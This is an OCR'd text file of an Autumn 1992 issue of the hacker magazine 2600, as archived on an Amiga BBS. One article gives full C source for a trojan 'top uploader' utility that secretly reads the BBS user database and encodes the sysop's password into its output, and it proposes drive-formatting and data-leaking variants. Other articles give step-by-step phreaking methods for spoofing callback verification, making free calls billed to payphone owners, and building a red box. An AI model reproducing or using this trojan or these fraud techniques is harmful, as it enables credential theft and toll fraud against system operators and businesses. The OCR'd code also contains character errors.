home *** CD-ROM | disk | FTP | other *** search
/ Amiga ISO Collection / AmigaDemoCD1.iso / DEMOS / ?-Hack&PhreakMAG-2600-6-3.LHA / 2600-9-3.txt next >
Encoding:
Text File  |  1992-09-02  |  140.6 KB  |  2,891 lines

  1.    \_/|____/   _______   _)___   _)_________  ,\____  ,\   ________  ,\
  2.    _/   __)   |  ,\_ ,    \_ ,    \_   ,\_ ,|   \_ ,|   \_  _)|__  :   \_
  3.    \    | |aBn:    / |     / |     /     /  :    /  :    / |    /  |    /
  4.     \ __: |______ /__:___ /______ / ___ /______ /______ /_____ /___|__ / 
  5.    <-\/---------\/------\/------\/----\/------\/------\/-----\/------\/-<
  6.                  ______________ .______________ ___ ___ 
  7.                 |   ________  ,\|\________    _)  ,|  ,\ 
  8.                 |    _)|__  :   \_   ,\_ ,:    \___.    \_  
  9.                 |   |    /  |    /     /  |     / ,|     /  
  10.                 |______ /___|__ /____ /___|___ /_______ / 
  11.    <------------------\/------\/----\/-------\/-------\/----------------< 
  12.          .M.Y.S.T.I.C. .C.A.N.A.D.I.A.N. .H.E.A.D.Q.U.A.R.T.E.R.S.          
  13.    <--------------------------------------------------------------------<
  14.                FUzZY nAVEL/iPL - ARTIC CAT/MsT - CuJo/TRSi  
  15.             ABH/ZTH/TRSi - CAPTAIN CAVEMAN/FRL -  CHEETAH/iPL 
  16.         /X3.++r - '030 25mhz - 705MEGS ONLINE AMIGA/PC/CONSOLE FILES! 
  17.    <--------------------------------------------------------------------< 
  18.             N1 - 1 - 4 1 6 - 2 8 7 - 2 9 7 9  - 14.4k uSR dUAL!
  19.             N2 - 1 - 4 1 6 - 2 8 1 - 3 9 1 2  - 14.4k uSR dUAL!
  20.             N3 - 1 - 4 1 6 - 2 8 1 - 4 3 0 1  - 14.4k v.32bIS!    
  21.    <--------------------------------------------------------------------< 
  22.        UPLOADED BY: CULPRIT          LOCATION: franklin quebec     
  23.                    ON: 23-Apr-94 @ 00:42:40 ON NODE: 1    
  24.    <--------------------------------------------------------------------<
  25.  
  26.  
  27.                                2600 Magazine
  28.                                Autumn, 1992
  29.  
  30.                                  OCR'd by:
  31.                    (Tsk, tsk.  You didn't really think I)
  32.                    (was gonna tell you that, did you?  &)
  33.                    (the next thing I know my phone, elec)
  34.                    (gas & cable are shut off, my Visa is)
  35.                    (maxed out, and the FBI says I killed)
  36.                    (JFK & MLK.  I think NOT!!!!!!!!!!!!!)
  37.  
  38.       (Anyway, you should buy, or better yet, subscribe to this GREAT)
  39.       (magazine, these guys need & deserve our support.  I have taken)
  40.       (great care to make sure that ALL addresses, etc. are accurate.)
  41.       (Still, considering just what it is they do, this is just a bit)
  42.       (ironic, isn't it??????????????????????????????????????????????)
  43.  
  44.  
  45.  
  46.                                      STAFF
  47.  
  48.                    Editor-In-Chief            Emmanuel Goldstein
  49.                    Office Manager             Tampruf
  50.                    Artwork                    Holly Kaufman Spruch
  51.  
  52.     "The back door program included a feature that was designed to modify a
  53.     computer in which the program was inserted so that the computer would be
  54.     destroyed if someone accessed it using a certain password.         United States Department of Justice, July 1992
  55.  
  56. Writers: Billsf, Eric Corley, Count Zero, The Devils Advocate,
  57. John Drake, Paul Estev, Mr. French, Bob Hardy, The Infidel,
  58. Knight Lightning, Kevin Mitnick, The Plague, Marshall Plann,
  59. David Ruderman, Bernie S., Silent Switchman, Scott Skinner,
  60. Mr. Upsetter, Dr. Williams, and the transparent adventurers.
  61. Technical Expertise: Rop Gonggnjp, Phiber Optik, Geo. C. Tilyou.
  62. Shout Outs: 8088, NSA, Mac, Franklin, Jutta, Eva, the Bellcore Support Group.
  63.  
  64.  
  65. 2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc.,
  66. 7 Strong's Lane, Setauket, NY 11733. Second class postage permit paid at
  67. Setauket, New York.
  68. POSTMASTER: Send address changes to
  69.           2600, P.O. Box 752, Middle Island, NY 11953-0752.
  70. Copyright (c) 1992 2600 Enterprises, Inc.
  71. Yearly subscription: U.S. and Canada: $21 individual, $50 corporate (U.S. funds).
  72. Overseas -- $30 individual, $65 corporate.
  73. Back issues available for 1984, 1985, 1986, 1987, 1988, 1989, 1990, 1991
  74. at $25 per year, $30 per year overseas. Individual issues available
  75. from 1988 on at $6.25 each, $7.50 each overseas.
  76.  
  77. ****************************************************************************
  78. *                                                                          *
  79. *    ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:                           *
  80. *    2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752.  *
  81. *    FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:                        *
  82. *    2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099.      *
  83. *    INTERNET ADDRESS: 2600@well.sf.ca.us                                  *
  84. *                                                                          *
  85. ****************************************************************************
  86.  
  87.      2600 Office Line: 516-751-2600, 2600 FAX Line: 516-751-2608
  88.  
  89.  
  90.  
  91.  
  92.                                   Hacking
  93.                               by Swinging Man
  94.   The recent article on security holes in WWIV BBS's got me to thinking. Where
  95. WWIV is the board of choice among clone sysops, AmiExpress is the dominant
  96. software in the Amiga community, the pirate community anyway.
  97.  
  98.   AmiExpress is a relatively simple piece of software, and that's good because
  99. it keeps things quick and easy. No means are provided for the sysop to keep
  100. track of top uploaders or even last callers. What is provided is a batch file
  101. that is executed each time a user logs off. In the batch file, one runs
  102. utilities to compile data into text files that are stored as bulletins. That
  103. way the next user sees a bulletin containing the last few users that called,
  104. etc. It's a hassle, but it works.
  105.  
  106.   When I ran my own board, I wrote my own utilities to fill in these functions.
  107. Then put them in an archive and sent them out into the ether. It's good
  108. advertising. Most sysops don't write their own (surprise!); they have enough
  109. trouble getting utilities written by other people to run. This means it's
  110. really easy to take advantage of them.
  111.  
  112.   Most utilities search through four files: BBS:USER.DATA, which holds all the
  113. records of users; BBS:NODEx/CallersLog (where x is the node number and is
  114. usually 0), which records all the important stuff a user does when he's online;
  115. BBS:UDLog, which is like CallersLog, but only records transfers; and
  116. BBS:conference/Dirx, which are the vanilla ASCII files containing the names and
  117. descriptions of all the "warez."
  118.  
  119.   USER.DATA is the most interesting. If one were to write a top uploader
  120. utility, as I have done in the past, one would need to open this file to sort
  121. all the users by bytes uploaded. While you've got the file open, why not save
  122. the sysop's password for later? That's what I've done in the example program
  123. called "Steal.C ." It prints the best uploader with a seemingly random border
  124. around his name. Here's what the output looks like:
  125.  
  126.             UtwFqNyXoVAKBfsegnxRvDbPrmcdWl
  127.             ##           PRESTO         ##
  128.             UpwFqayXosAKBssegwxRvobPrrcdWd
  129.  
  130.   It looks random, but the difference between the top line and the bottom
  131. spells out "passwor&" Easy to see ff you're Iooldng for it, but if you're not
  132. paying attention it just looks like garbage. Of course, you could think up a
  133. better method of encrypting the password than just replacing every fourth
  134. letter. 
  135.  
  136.   This one is neat because you can just log on and see the sysop's password,
  137. but it's not the only way to do it. You could do anything to any user; however,
  138. the more specific the program becomes, the less useful it will become. It's not
  139. easy to get a sysop to change top uploader utilities. It would have to be better
  140. than the one he has, or maybe a fake update.
  141.  
  142.   I can think of endless fun to have with these utilities. How about a bit of
  143. conditional code that formats all drives when a certain user logs on, such as
  144. "Kill Board." Or maybe you just want to copy USER.DATA to a download path,
  145. renamed as "coolware.dms".
  146.  
  147.   So what can you do if you're an AmiExpress sysop? Don't use utilities written
  148. by anyone other than yourself. There isn't any other way. You can monitor the
  149. files opened when a utility is run, but an event-driven action won't be
  150. detected. Or you could look at the whole file and look for any text The text
  151. strings passed to DOS are usually intact. Of course a crunching program like
  152. IMPLODER will get rid of this. And an IMPLODED file can be encrypted with a
  153. password, so good luck finding something that way. Then again, you could
  154. always just forget it. It's only a BBS... you've got nothing to hide.  Right?
  155.  
  156.   This idea isn't just about AmiExpress.  How many BBS's have doors, or online
  157. games? How hard would it be to write a game like TradeWars that has an extra
  158. option that does any of the nasty things you've always wanted to do?
  159.  
  160.  
  161.       ------------------------------------------------------------------
  162.  
  163.  
  164. /**************************************************************************/
  165. /** SysOp Password Stealer vl.0 by Swinging Man                          **/
  166. /** Prints top uploader.....but also reveals SysOp's password            **/
  167. /** in the boarder                                                       **/
  168. /**************************************************************************/
  169. #include <stdio.h>
  170. #include <ctype.h>
  171. #include <time.h>
  172.  
  173. struct userdata { /* 232 bytes */
  174.  
  175. /* Since I hacked this out, there are still many */
  176. /* unknown areas of the record             */
  177.  
  178. char name[31];                       /*user's name*/
  179. char pass[9];                        /*user's password*/
  180. char from[30];                       /*user's FROM field*/
  181. char lone[13];                       /*phone number field*/
  182. unsigned short number;               /*user number*/
  183. unsigned short level;                /* level*/
  184. unsigned short type;                 /*type of ratio*/
  185. unsigned short ratio;                /*ratio of DLs to one UL*/
  186. unsigned short computer;             /*computer type*/
  187. unsigned short posts;                /*number of posts*/
  188. char unknownO[40];
  189. char basel10];                       /*conference access*/
  190. unsigned int unknown_numO;
  191. unsigned int unknown_numl;
  192. unsigned int unknown_num2;
  193. unsigned int used;                   /*seconds used today*/
  194. unsigned int timel;                  /*time per day*/
  195. unsigned int time2;                  /*clone of above*/
  196. unsigned int bytesdn;                /*bytes downloaded*/
  197. unsigned int bytesup;                /*bytes uploaded*/
  198. unsigned int bytelimit;              /*bytes avail per day*/
  199. unsigned int unknown_num3;
  200. char unknown1 [46];
  201. };
  202.    FILE *fp;
  203. struct list {
  204.    char name[40];
  205.    unsigned int bytes_uploaded;
  206.    struct list *next;
  207.    };
  208.  
  209. char rnd() {
  210.    char c;
  211.    c = (char)rand();
  212.    while(!(isalpha(c)) || (c<20)) c = (char)rand();
  213.  return (c);
  214.  }
  215.  
  216. main() {
  217.  
  218. int x,y;
  219.  
  220. struct userdata user;
  221. struct list head;
  222. struct list *temp, *temp2;
  223.  
  224. char password[9];
  225.  
  226. char border[31 ];
  227. char middle[31 ] = "##                          ##";
  228.  
  229. head.next = NULL;
  230.  
  231. if((fp = fopen("bbs:user.data","r")) == NULL) {
  232.     printf("Can't Open User File\n");
  233.     return 1;
  234.     }
  235.  
  236. /*get all users and put in list*/
  237. while(fread((void *)&user, sizeof(struct userdata), 1, fp) == 1){
  238.     if(user.number == 1) strcpy(password, user.pass);
  239.     if((user.level<200) &&(user.level>O)
  240.       && (user.bytesdn > 0)) {
  241.       ternp = (struct list *)malloc(sizeof(struct list));
  242.       if(temp == NULL) {
  243.         printf("Out of Memory!\n");
  244.         exit(1);
  245.       }
  246.       strcpy(temp->name, user.name);
  247.       temp->bytes_uploaded = user.bytesup;
  248.       temp2 = &head;
  249.       while((temp2->next != NULL)
  250.            && ((temp2->next->bytes_uploaded)
  251.                    > (temp->bytes_uploaded))) {
  252.         temp2 = temp2->next;
  253.       }
  254.       temp->next = temp2->next;
  255.       temp2->next = temp;
  256.     }
  257.   }
  258. fclose(fp);
  259. temp = head.next;
  260. srand((unsigned int)time(NULL));
  261. y = O;
  262. for(x=O;x<30;x++) border[x] = rnd();
  263. border[30] = '\0';
  264. printf("%s\n" ,border);
  265. strncpy(&middle[15-(strlen(temp->name)/2)],temp->name,strlen(temp->name));
  266. printf ("%s\n" .middle);
  267. for(x=1 ;x<30;x+=4) border[x] = password[y++];
  268. printf("%s\n" ,border);
  269. }
  270.  
  271.  
  272.       ------------------------------------------------------------------
  273.  
  274.  
  275.                  THE ALLIANCE AGAINST FRAUD IN TELEMARKETING
  276.                           NATIONAL CONSUMERS LEAGUE
  277.  
  278. THE TOP TEN SCAMS OF 1991
  279.  
  280. 1. POSTCARD GUARANTEED PRIZE OFFERS
  281.      You Are A DEFINITE Winner
  282.  
  283. 2. ADVANCE FEE LOANS
  284.      A Small Fee' For Processing The Application
  285.  
  286. 3. FRAUDULENT 900 NUMBER PROMOTIONS
  287.      Dial 900 To Claim Your Gift
  288.  
  289. 4. PRECIOUS METAL INVESTMENT SCHEMES
  290.      Gold Bullion: A 700% Profit Guaranteed Within Six Months
  291.  
  292. 5. TOLL CALL FRAUD
  293.      For Ten Bucksc Call Anywhere In The World
  294.  
  295. 6. HEADLINE GRABBERS
  296.      Thousands of Jobs Available: Help Rebuild Kuwait
  297.  
  298. 7. DIRECT DEBIT FROM CHECKING ACCOUNTS
  299.       Give Us Your Checking Account Number: We'll Handle The Rest
  300.  
  301. 8. PHONY YELLOW PAGES INVOICES
  302.       Send Us Your Check Today, To Make Sure Your Firm Is Listed
  303.  
  304. 9. PHONY CREDIT CARD PROMOTIONS
  305.       Bad Credit? No Credit? No Problem
  306.  
  307. 10. COLLECTORS ITEMS
  308.       Fabulous Coins At A Fraction Of The Dealer Price
  309.  
  310. THE ALLIANCE AGAINST FRAUD IN TELEMARKETING
  311. C/O THE NATIONAL CONSUMERS LEAGUE
  312. 815 FIFTEENTH STREET N.W., SUITE 928-N
  313. WASHINGTON, DC 20005
  314. 202-639-8140
  315.  
  316.  
  317.  
  318.       ------------------------------------------------------------------
  319.  
  320.  
  321.       --
  322.      ----
  323.   ----------    AT&T
  324.      ----
  325.       --
  326.  
  327.   Dear #########  {Minor Threat},
  328.  
  329.   AT&T has reason to believe that the telephone listed to you has been used in
  330. violation of Federal Comunnications Commission - AT&T Tariff F.C.C. No. 2
  331. Sections 2.2.3 and 2.2.4.C. These tariff sections prohibit using WATS to harass
  332. another, using WATS to interfere with the use of service by others and using
  333. WATS with the intent of gaining access to a WATS Customer's outbound calling
  334. capabilities on an unauthorized basis.
  335.  
  336. Accordingly, AT&T has temporarily restricted your telephones service's ability
  337. to place AT&T calls in accordance with section 2.8.2 of the above tariff. If
  338. the abusive calling occurs after AT&T lifts the temporary restrictions, the
  339. restriction will be reimposed until AT&T is satisfied that you have undertaken
  340. steps to secure your number againsl future tariff violations.
  341.  
  342. You should also note that unauthorized possession or use of access codes can
  343. constitute a violation of United States Criminal Code - Title 18, Section 1029,
  344. which carries a penalty of up to a $10,000 fine and up to 10 years imprisonment
  345. for first thne offenders. Any future activity from telephones listed to you may
  346. be referred to federal law enforcement officials.
  347.  
  348. If you wish to discuss this restrictions you may do so in writing to AT&T
  349. Corporate Security, CN 4901, Warren, NJ 07059-4901.
  350.  
  351.  {According to Minor Threat, this letter was received about a week after he
  352.   had scanned about 50 800 numbers in the 222 prefix sequentially by hand.}
  353.  
  354.  
  355.  
  356.       ------------------------------------------------------------------
  357.  
  358.  
  359.                         Defeating Callback Verification
  360.                                by Dr. Delam
  361.     So you feel you've finally met your match. While applying at this board
  362. that you've applied at before, you use a fake name, address, and phone
  363. number. Then comes the part you hate most: the callback verification. "How in
  364. hell am I going to get access without giving out my real number?! I guess i'll
  365. just have to 'engineer' the sysop." Only this particular sysop is too good.
  366. He tries a voice verification, and finds either a bad number or someone who
  367. doesn't even know what a BBS is. Now you have to reapply again! If you worked
  368. for the phone company or knew how to hack it, maybe you could set yourself up
  369. with a temporary number, but unfortunately you don't. So you think hard and
  370. come up with an idea: "All need is a local direct dial VMB. Then I can just
  371. have the sysop call that and make him think it's my home VMB system... that
  372. is, if I can find one to hack."
  373.  
  374.     Naw, still too hard. There must be an easier way. Loop? No, who wants to
  375. wait forever on a loop - every so often talking with Fred the pissed-off
  376. lineman. What else, what else? You can remember the things you used to do as
  377. a kid before you even knew what phreaking or hacking was. How about the time
  378. you called your friend Chris and at some point in the conversation, when
  379. things got boring, Chris said "I'm gonna call Mike now. Bye!" But you didn't
  380. want to hang up. You heard click, click... but no dialtone. You say "Hello?"
  381. and suddenly you hear Chris shout "Hang up the phone!" Haha! You had
  382. discovered a new trick! If you originated the call, you had ultimate
  383. control! That means if I call a BBS and it hangs up first, I actually am
  384. still connected to the line for a brief period (usually a maximum of 15
  385. seconds); and if the BBS picks up again to dial me for callback verification,
  386. it will get me for sure, regardless of the number it has!"
  387.  
  388.     This leaves just two problems to solve.  The first problem occurs when
  389. your modem senses a drop in DTR or loss in carrier from the BBS's modem, it
  390. will go on-hook. This means you will have to catch the phone before your modem
  391. hangs up. Your modem may have a setting that will ignore these changes. If
  392. not, you can build a busy switch. This may be done by placing a 1K ohm
  393. resistor and an SPST switch between the ring and tip (red and green) wires of
  394. your phone line. Completing this circuit at any time while online has
  395. the effect of a permanent off hook condition. The resistance provided is
  396. equivalent to the resistance present when your phone is off hook, thus
  397. creating a condition the C.O. recognizes as off hook. With good soldering and
  398. a good switch, no interference will be present after the switch is thrown
  399. while connected.
  400.     Note: Sysops may find the busy switch useful as a confirmation that the
  401. phone line is "busied out" when the BBS is taken down. Sometimes during down
  402. times a reboot or power down is necessary, which will cancel any busying
  403. effects the modem had set previously, making a busy switch in this case
  404. ideal. The second problem occurs when the BBS's modem expects a dialtone
  405. after going from on hook to off hook. A dialtone will have to be provided for
  406. the BBS's modem before it will try dialing whatever phone number you
  407. provided. This requires what I call a "CAVERN box" (CAllback VERificatioN).
  408. Like many other boxes, it is a simple generation of tones. For a cheap and
  409. inexpensive method, use a tape recorder to record and play back the dialtone.
  410. Computer sound generation hasn't been tested, but most PC speakers generate a
  411. square wave, while dialtones are sinusoidal. The best chance for accurate,
  412. artificial sound generation is with a synthesizer. The two frequencies of a
  413. dialtone are 300hz and 420hz. Many  musicians  recognize 440.00hz as the note
  414. A4, and the frequency from which scales are built. Just below A4 on an equal
  415. tempered chromatic scale is at 415.30hz. Tuning a synthesizer just shy of a
  416. positive quarter tone from the normal scale will yield a G#4 at 420hz and
  417. bring the D4 of 293.66hz within an acceptable range of 300hz.
  418.  
  419.     Needless to say, once you have prevented your modem from hanging up and
  420. have generated a dialtone which has effectively caused the BBS's modem to
  421. dial the phone number, you should issue an answer tone by typing the Hayes
  422. "ATA" command. You will then be connected with the BBS's modem and will have
  423. protected your identification.
  424.  
  425.     Thanks to Green Hell for some help in generating concepts presented.
  426.  
  427.  
  428.  
  429.       ------------------------------------------------------------------
  430.  
  431.                               WRITE FOR 2600!
  432.                            SEND YOUR ARTICLES TO:
  433.                           2600 ARTICLE SUBMISSIONS
  434.                                 P.O. BOX 99
  435.                           MIDDLE ISLAND, NY 11953
  436.                         INTERNET: 2600@well.sf.ca.us
  437.                        Remember, all writers get free
  438.                         subscriptions as well as free
  439.                       accounts on our voice mail system.
  440.                      To contact a 2600 writer, call 0700-
  441.                      751-2600.  If you're not using AT&T,
  442.                       preface that with 10288.  Use touch
  443.                         tones to track down the writer
  444.                      you're looking for.  Overseas callers
  445.                        can call our office (516) 751-2600
  446.                          and we'll forward the message.
  447.  
  448.  
  449.       ------------------------------------------------------------------
  450.  
  451.  
  452.                             ADJUSTMENT LETTER
  453.                         CALLING CARD FRAUD CLAIMS
  454.  
  455. Date_______
  456. Customer Name
  457. City, State
  458. Re: (Account Number)
  459.  
  460.  
  461. Dear ___________________,
  462.  
  463.   Your AT&T Calling Card is a valuable service to help meet
  464. your long distance needs.  AT&T is concerned with quickly
  465. resolving any unauthorized charges associated with your AT&T
  466. Calling card.  In response to your request, we have removed the
  467. disputed charges from your account. This credit is made pending
  468. an investigation of your claim by AT&T.
  469.  
  470. To facilitate the investigation of your claim, please complete
  471. the bottom portion of this letter.  Read the information,
  472. describe the facts surrounding your claim, include any relavent
  473. documentation that you may have, sign and return it to us in the
  474. enclosed postage-paig envlope.
  475.  
  476. (Please complete this portion and return to AT&T Security.)
  477.  
  478. AT&T Corporate Security
  479. P.O.  Box 1927
  480. Roswell, Georgia 30077-1927
  481.  
  482. On my ___/___/___    Billing statement(s), long distance charges for
  483. calls in the amount of $_______  were billed to my telephone
  484. number__________________.  These calls were not made or authorized by
  485. me.     I have received an adjustment for these calls and
  486. understand that this adjustment is made pending an investigation
  487. of my claim by AT&T Security.
  488.  
  489. (Please describe the facts which lead you to believe these
  490. are unauthorized.   You may attach additional sheets if needed.)
  491.  
  492. I will cooperate with AT&T Security in investigating my claim.
  493.                  Signed______________________________
  494.                  Print Name__________________________
  495.                  Social Security Number______________
  496.                  Account Number______________________
  497.  
  498.   If you have any questions, please call AT&T Security at
  499. 800 346-4073 or 800 346-4074.
  500.  
  501. Sincerely,
  502.  
  503. Account Representative
  504.  
  505.          ****WHAT A GREAT SCAM TO GET SOCIAL SECURITY NUMBERS.****
  506.  
  507.  
  508.  
  509.       ------------------------------------------------------------------
  510.  
  511.  
  512.  
  513. PHONE MANAGEMENT ENTERPRISES
  514. 396 WASHINGTON AVENUE
  515. CARLSTADT, NEW JERSEY 07072
  516. (201) 507-1951
  517. FAX (201) 507-1095
  518.  
  519. THIS LETTER IS REGARDING YOUR RECENT REQUEST FOR A REFUND ON THE
  520. PAY TELEPHONE YOU USED.   WE APOLOGIZE FOR ANY INCONVENIENCE THIS
  521. MAY HAVE CAUSED YOU AND WE ASSURE YOU,  THE PROBLEM HAS BEEN
  522. CORRECTED.
  523.  
  524. WE ARE ENCLOSING, IN LIEU OF A CASH REFUND , UNITED STATES POSTAL
  525. STAMPS TO COVER YOUR LOSS, THIS BEING A SAFER WAY FOR YOU TO BE
  526. ASSURED OF YOUR REFUND.
  527.  
  528. SHOULD YOU HAVE ANY QUESTIONS, PLEASE CALL US AT (201) 507-1951.
  529.  
  530. SINCERELY,
  531.  
  532. PHONE MANAGEMENT ENTERPRISES, INC.
  533.  
  534. This is what happens when you request a refund from this company. In this
  535. case, correspondent Winston Smith received two 25 cent stamps which
  536. means he now has to get two four-cent stamps if he wants to mail anything.
  537. Note also that this letter is actually a xerox of a fax that originated
  538. with Tri State Radio Co. The wondrous mysteries of a COCOT  ....
  539.  
  540.  
  541.  
  542.       ------------------------------------------------------------------
  543.  
  544.  
  545.                         SHOPPER'S GUIDE TO COCOTS
  546.                              by Count Zerg
  547.                        Restricted Data Transmission
  548.                  'Truth is Cheep, but information costs'
  549.  
  550.     So you're walking down the street and you see a payphone. Gotta make an
  551. important call, so you dig into your pocket to get a dime. Picking up the
  552. handset, you suddenly notice that the payphone wants a quarter for a local
  553. call! What the hell, and where did this synthesized voice come from?
  554.  
  555.     Let's make this article short and to the point. COCOT is an acronym for
  556. Customer Owned Coin Operated Telephone. In other words, a COCOT is a phone
  557. owned or rented by a paying customer (most likely, a hotel or donut shop). A
  558. COCOT is not a normal payphone. The telco doesn't own it, and the actual phone
  559. line is usually a normal customer loop (unlike payphones, where the phone line
  560. is a 'special" payphone loop, allowing the use of "coin tones" to indicate
  561. money dropped in). So a COCOT may look and smell like a telco payphone, but it
  562. is not.
  563.  
  564.     Why do COCOTs exist? Simple. Money? A customer owned payphone is money in
  565. the bank. You pay more for local calls and long distance is typically handled
  566. by sleazy carriers that offer bad/expensive service. The owner/renter of the
  567. COCOT opens the coinbox and keeps the money him/herself! Also, a particularly
  568. sleazy quality of a COCOT is the fact that it does not receive incoming calls.
  569. This, of course, is because of money. If people are calling in to a COCOT, the
  570. COCOT is not making money and businesses always want to make as much money as
  571. possible even if it hurts the consumer. Think about it. It really sucks to
  572. call someone at home from a COCOT and then not be able to have him/her call
  573. you back to save money. "Guess I'II have to keep feeding the COCOT quarters!"
  574.  
  575.     Where is a good place to look for COCOTs? Outside Dunkin Donut shops,
  576. restaurants, clubs, bars, and outside/inside hotels and 'convenient" locations.
  577.  
  578.     How do l figure out if I have found a COCOT? Simple. A COCOT will have no
  579. telco logos on it. It may look just like a telco phone chrome with blue
  580. stickers and all that. Also, a COCOT typically charges more for a local call
  581. than a regular telco payphone.  (In Massachusetts, local calls are a dime. In
  582. places like New York City, they are 25 cents.) A COCOT will most often have a
  583. synthesized voice that asks you to "please deposit 25 cents" or whatever.
  584. Also, some fancy COCOTS will not look like payphones at all. Some in hotels
  585. have weird LCD displays and look totally different but they always charge you
  586. more than a normal payphone.
  587.  
  588.     I found this weird payphone in Boston that wants  a quarter,  and this
  589. synthesized voice is harassing me. When does the phun begin? Soon. First of
  590. all, you must understand that the COCOT is a mimic. Essentially, it wants you
  591. to think that it is just a plain ol' payphone. Pick up the handset. Hear that
  592. dialtone? Hah? That dialtone is fake. synthesized by the innards of the COCOT.
  593. You are at the mercy of the COCOT. Remember, a COCOT runs off of a normal
  594. customer loop so, unlike a telco payphone where you must deposit money to
  595. generate coin tones that are read by the central office, the security of a
  596. COCOT depends solely on the COCOT phone itself. It's as if you took your own
  597. phone and put a sign on it saying "Please put 10 cents in this jar for every
  598. call you make." COCOTS are not naive. They won't let you near the unrestricted
  599. dialtone until you fork over the cash-ola. Or so they think!
  600.  
  601.     See, the Achilles heel of the COCOT is the fact that all payphones must let
  602. you make 1-800 calls for free! It's not just a fact, it's the law. Now pick up
  603. the handset again and place a 1-800 call. Any 1-800 number will do. When they
  604. answer at the other end, just sit there. Do nothing. Ignore them. Wait for
  605. them to hang up the phone. Here's an example.
  606.  
  607.     Dial 1-800-LOAN-YES.
  608.     [Ring, Ring] ... [click] "Hello, you wanna buy some money?
  609.     Hello? HELLO?!" [CLICK]
  610.     (You will now hear some static and probably a strange "waffling" noise,
  611.     like chh, chh, chh, chh, chh)
  612.     [CLICK] DIALTONEl
  613.  
  614.     Now what have we got here? A dialtone? Yes, you guessed it, the
  615. dialtone you now hear is the unrestricted dialtone of the COCOT's customer loop.
  616.  
  617.     So what? So I got an "unrestricted dialtone". Big deal?
  618.  
  619.     Meathead! With an unrestricted dialtone, all you need to do is place a call
  620. via DTMF tones (the tones a touch-tone keypad generates). Now, try dialing a
  621. number with the COCOT's keypad. Whoal Waitasec, no sound! This is a typical
  622. lame attempt at protection by the COCOT. Just whip out your Radio Shack pocket
  623. tone dialer and try calling a number, any number. Place it just as if you were
  624. calling from a home phone. Call a 1-900 sex line. Call Guam. You are free and
  625. the COCOT's customer loop is being billed!
  626.  
  627.     Note: some COCOTS are more sophisticated at protecting themselves. Some
  628. will reset when they hear the dialtone. To get around this, make a loud
  629. hissing sound with your mouth into the mouthpiece after the 1-800 number hangs
  630. up. Get your tone dialer ready near the mouthpiece. When you hear the
  631. dialtone, quickly dial the first digit of the number you want to call. If you
  632. hiss loudly enough, you may be able to mask the sound of the dialtone and
  633. prevent the COCOT from resetting. Once you dial the first digit of the number
  634. you are calling, the dialtone will disappear (naturally). You can stop hissing
  635. like an idiot now. Finish dialing your free phone call. Also, some COCOTs
  636. actually disable the handset after a call hangs up (in other words, you can't
  637. send DTMF tones through the mouthpiece). Oh well, better luck next time.
  638.  
  639.     However most of the COCOTs I have run across only disable the DTMF
  640. keypad. So all you need is a pocket dialer to circumvent this!
  641.  
  642.     Other things to know: Sure, you can't call a COCOT, but it does have a
  643. number. To find out the COCOT's number, call one of the automated ANI services
  644. that tell you the number you're dialing from (the numbers keep changing but
  645. they are frequently printed in 2600). Now try calling the COCOT from another
  646. phone. You will hear one of two things: 1) synthesized voice: "Thank you"
  647. [DTMF tones] [CLICK] [hang up]; 2) weird carrier.
  648.  
  649.     A COCOT's number is only used by the company that built or sold the COCOT.
  650. By calling up a COCOT, a tech can monitor its functioning, etc. In case number
  651. 1, you must enter a 3 or 4 digit password and then you'II get into a voice
  652. menu driven program that'Il let you do "maintenance" stuff with the COCOT. In
  653. case number 2, you are hooked to the COCOT's 300 bps modem (Yes, a modem in a
  654. payphone). Likewise. if you can figure out the communications settings, you'll
  655. be into the COCOT's maintenance routines.
  656.  
  657.     Personally. l haven't had much luck (or patience) with calling up and
  658. hacking COCOT maintenance functions. l just like making free phone calls from
  659. them.
  660.  
  661.     COCOT Etiquette: Now, remember, you are making free phone calls but
  662. someone has to pay for them and that is the owner. The COCOT's customer loop
  663. is billed the cost of the calls, and if the owner sees a big difference in the
  664. profits made on the COCOT (profit equals coins from the COCOT minus the bill
  665. from the telco for customer loop), they'Il know something is up. So the rule
  666. is don't abuse them/Don't call a 1-900 number and stay on the line for 12
  667. hours! If a COCOT is abused severely, an owner will eventually lose money on
  668. the damn thing. And that means bye bye COCOT. Also, remember that a record of
  669. all long distance calls is made to the COCOT's customer loop and COCOT
  670. companies will sometimes investigate "billing discrepancies" so don't call
  671. anyone you personally know unless you are sure they are "cool".
  672.  
  673.     [RING RING] "Hello?"
  674.     "Hello, this is Cointel, Inc. We'd like to ask you a few questions about a
  675.     call you received from Boston on 2/12/91. Could you tell us the name and
  676.     address of the person who placed the call?"
  677.     Cool dude: "What? I don't remember. Go to hell! [SLAM]"
  678.     Meathead: "Uh, sure, his name is John Smith. You want his address too?"
  679.  
  680.     Get the picture? Good....
  681.  
  682.     COCOTs are a great resource if we use them wisely, like our environment.
  683. We've gotta be careful not to plunder them. Make a few long distance calls and
  684. then leave that particular COCOT alone for awhile. Chances are your bills will
  685. be "absorbed" by the profit margin of the owner and probably ignored but the
  686. smaller the owner's profit margin gets, the more likely suspicions will be
  687. aroused. 'nuff said! I have found COCOTs everywhere. COCOT technology is
  688. relatively new, though. I know many towns that have none. Check out big cities.
  689.  
  690.     As for a tone dialer, don't leave home without one! A true phreak always
  691. has a DTMF tone dialer at hand along with a red box! My personal favorite is
  692. the COMBO-BOX (red box plus DTMF). Take a Radio Shack 33-memory Pocket Dialer.
  693. Open up the back. Remove the little 3.579 MHz crystal (looks like a metal
  694. cylinder). Unsolder it. Solder on a couple of thin, insulated wires where the
  695. crystal was attached. Thread the wires through one of the "vents" in the back
  696. of the tone dialer. Get ahold of a 6.5536 MHz crystal (available thru Fry's
  697. Electronics, 89 cents apiece, phone number (415) 770-3763). Go out and get
  698. some quick drying epoxy and a Radio Shack mini Toggle Switch. DPDT, cat. #275-
  699. 626. Close the tone dialer, with the two wires sticking out one of the back
  700. vents. Screw it up tight. Now, attach the crystals and wires to the switch
  701. with solder as in the diagram below:
  702.  
  703.              |^^^^^|
  704.                                       |    xx  <3.579 crystal> small one
  705.                                       |    |
  706.              toggle switch ->       oooooooX     xxxxs <two wires>
  707.                                       |    |
  708.                                       |    xx   <6.5536 crystal> big one
  709.                                       |    |
  710.                                        ^^^^^
  711.  
  712.     Each "xx" prong in the diagram is actually two prongs. Hook up the two
  713. leads from the crystals to separate prongs (same with the wires).
  714.  
